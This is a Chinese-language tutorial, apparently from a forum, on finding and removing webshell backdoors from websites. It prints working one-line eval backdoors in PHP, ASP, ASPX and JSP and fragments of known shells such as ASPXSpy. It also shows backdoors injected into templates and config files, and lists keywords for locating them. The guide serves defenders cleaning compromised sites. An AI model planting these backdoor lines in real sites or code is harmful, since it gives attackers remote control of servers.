webshell网站后门的清除方法

webshell 网站后门的清除有两种情况：
（1）一种是后门的文件可以直接删除，根据云盾控制台提示的路径找到后门文件，直接删除即可。
（2）一种是不能直接删除后门文件，只能删除文件内容中的木马代码进行清除。
一、可以直接删除后门文件的4中特点
1、文件名为index.asp 、index.php，这类为自动生成SEO类型文件，可以直接删除，如要彻底清除后门，需找生成此文件的源文件。 可删除准确度99%
2、文件内容只有一行，或很少量的代码，此类被称为“一句话后门”。可直接删除准确度98%

<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
<%eval request("pass")%>
<?php @eval($_POST['pass']);?>
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter ("f"))).write(request.getParameter("t").getBytes());%>

3、文件内容中存在password或UserPass关键字，可直接删除准确度95%。

1. <%@ LANGUAGE = VBScript.Encode %><%
2. UserPass="hack"
3. SiteURL="www.hack.com"
4. Copyright="xxxx"
5. bj="#000000"
6. wz="#ddd"
7. budu="#ddd"
8. #@~^DlYBAA==@#@&?nM\DRUmMrwDKr:W;O{,,O1,O,,Ol]+kwKxd+ $!0W+M~'DD;n=rx~3MDGD,]/;s+,1+XY=dE(PjtKh3.M`#= (0,2DM~Ptx@#@&]IjE@!4.@*@!CP4DnW{BLC-m/^Db2D)4b/DWDHR(Cm0`bB@*@!8.@*PJ,'PADDc9n/1DbwOkGU,[~J@!&l@*@!8.@*J@#@&3MD Z^nmDl"+kwW / s^Edt@#@&3U9Pq6@#@&xN,d;4=?!4~I]jv/OD*lD/2G /+ AMkO+vdDDb=2 NPUE(ls!x^YbWU~"+nmOtv? #=]nnmY4']+2smmn`USJ'JSE'-JblAx[Pw; mObW )s!x1Ok

1. <%@ LANGUAGE = VBScript.Encode %>
2. <%
3. UserPass="chen"
4. #@~^2iEBAA==@#@&P~,P,@#@&s1mh+{J9lM3~jmEMrYHPKChJid@#@&j+.-D ?1.kaYPrs+W;O{,1,O1O,1O)"+/aW d+cA;06+.xDDElr P2M.GD,I/;:n~g+aY=$W9X/G^WDxE[!T!rlwWUDZKVWM'r:,OZ/,OJlJbx3;GVKD'r:W06J=AGD[nMZGVK.'ra+J)Jr 36\.~9xraZ!!r)drx0r- +MsGUD'JMnNr):U;ZKVKDxJ:q8FE)wGDsZGsKDA%xran+E=sGM:;WV

1. <%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
2. <%@ import Namespace="System.IO"%>
3. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1- transitional.dtd">
4. <script runat="server">
5. public string Password="d86ac8d11918df21b8b0d4918df597f0";//
6. public string vbhLn="ASPXSpy";
7. public int TdgGU=1;
8. protected OleDbConnection Dtdr=new OleDbConnection();
9. protected OleDbCommand Kkvb=new OleDbCommand();

1. <%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" %>
2. <%@ import Namespace="System.IO" %>
3. <script runat="server">
4. public string Password = "d066d3a4bdec27d1e34f40ee2a972407";//
5. [color=#ff0000]public string SessionName = "WinSpy";[/color]
6. public string Bin_Action = "";
7. public string Bin_Request = "";
8. protected OleDbConnection conn = new OleDbConnection();
9. protected OleDbCommand comm = new OleDbCommand();

1. <object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
2. <object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
3. <%@ LANGUAGE = VBScript.encode%><%
4. Server.ScriptTimeout=999999999
5. UserPass="admin"

1. <?php
2. error_reporting(7);
3. @set_magic_quotes_runtime(0);
4. 省略很多....
5. $admin = array();
6. $admin['check'] = true;
7. $admin['pass'] = 'bd28bb51a431e1cf83d34b785dc94c91';
8. $admin['cookiepre'] = '';
9. $admin['cookiedomain'] = '';
10.$admin['cookiepath'] = '/';
11.$admin['cookielife'] = 86400;

4、另外一些在上传组件目录或上传目录的文件可以直接删除。可直接删除准确度90%
如 eWebEditor、Editor、FCKeditor、webeditor、UploadFiles、uploads等。
二、以下几个特点的文件，不能直接删除文件，只能删除文件内容中的木马代码进行清除。
1、网站自身文件被插入恶意代码
1. 省略很多...
2. <table border="0" cellspacing="0" cellpadding="3">
3. {assign var="col" value="1"}
4. {foreach key=tid item=enable_component from=$enable_components}
5. {if $col==1}
6. <tr> {/if}
7. <td width="">
8. <label id="l_{$enable_component.link}">
9. <input name="from_component[]" onclick="toggleInput('l_{$enable_component.link}')"type="checkbox" value="{$enable_component.link}" checked="checked" />
10. {$enable_component.title}</label><?php @eval($_POST['cron']);?></td>
11. {if $col==5} </tr> {assign var="col" value="1"} {else} {math equation="x + 1" x=$col assign="col"} {/if}
12. {/foreach}
13. {if $col>1}
14. <td colspan="{math equation="x - y + 1" x=$col y=5}"> </td>
15. {/if}
16. </table>
17. 省略很多...
2、网站配置文件(当然也属于网站自身文件)
1. <%
2. Const runMode=1
3. Const sitePath=""
4. Const accessFilePath="data/data.asp"
5. Const dbType=0
6. Const databaseServer="192.168.1.11"
7. Const databaseName="aspcms"
8. Const databaseUser="aspcms"
9. Const databasepwd="aspcms"
10.Const fileExt=".html"
11.Const upLoadPath="upLoad"
12.Const waterMarkFont="hahahaha"
13.Const waterMarkPic="/images/logo.png"
14.Const waterMarkLocation="1"
15.Const smtp_usermail="aspcmstest@163.com"
16.Const smtp_user="aspcmstest"
17.Const smtp_password="aspcms.cn"
18.Const smtp_server="smtp.163.com"
19.Const messageAlertsEmail="11111111@qq.com"
20.Const slideTextStatus=1%><%Eval(Request (chr(65)))%><%
21.Const slideNum=4
22.%>

1. <%dim conn,ustr,udb
2. ustr = "Provider = Sqloledb; User ID=sa; Password=111111; Initial Catalog=dc_data; Data Source=(local);"
3. Set conn= Server.CreateObject("ADODB.Connection")
4. conn.Open ustr
5. Function yDate(ndate)
6. 省略很多...
7. %>
8. <%eval request("pass")%>
1. <?php
2. define('UC_CONNECT', 'mysql');
3. define('UC_DBHOST', 'localhost');
4. define('UC_DBUSER', 'root');
5. define('UC_DBPW', '123456');
6. define('UC_DBNAME', 'web');
7. define('UC_DBCHARSET', 'gbk');
8. define('UC_DBTABLEPRE', '`web1`.pre_ucenter_');
9. define('UC_KEY', 'NbZ9v3M3vbV7K7Nbfc1bH5D3X245M7vcOb25M2L8X1H4M0696976KaL5k8N7Z35f');
10. define('UC_API', 'http://www.xxxx.com/uc_server');eval($_POST[1]);//');
11.?>
这类插入网站自身代码中的后门清除方法：首先备份此文件以备改错可恢复, 打开文件，查找到后门代码的位置，一般通过查找“eval、execute、request、ExecuteGlobal”关键字进行定位。 把确定为后门的代码删除后保存文件。访问网站看是否报错。已确认有没有改错。

------------------------------------------------------------------------
璇璇视频教程学习论坛,视频教程免费下载欢迎您！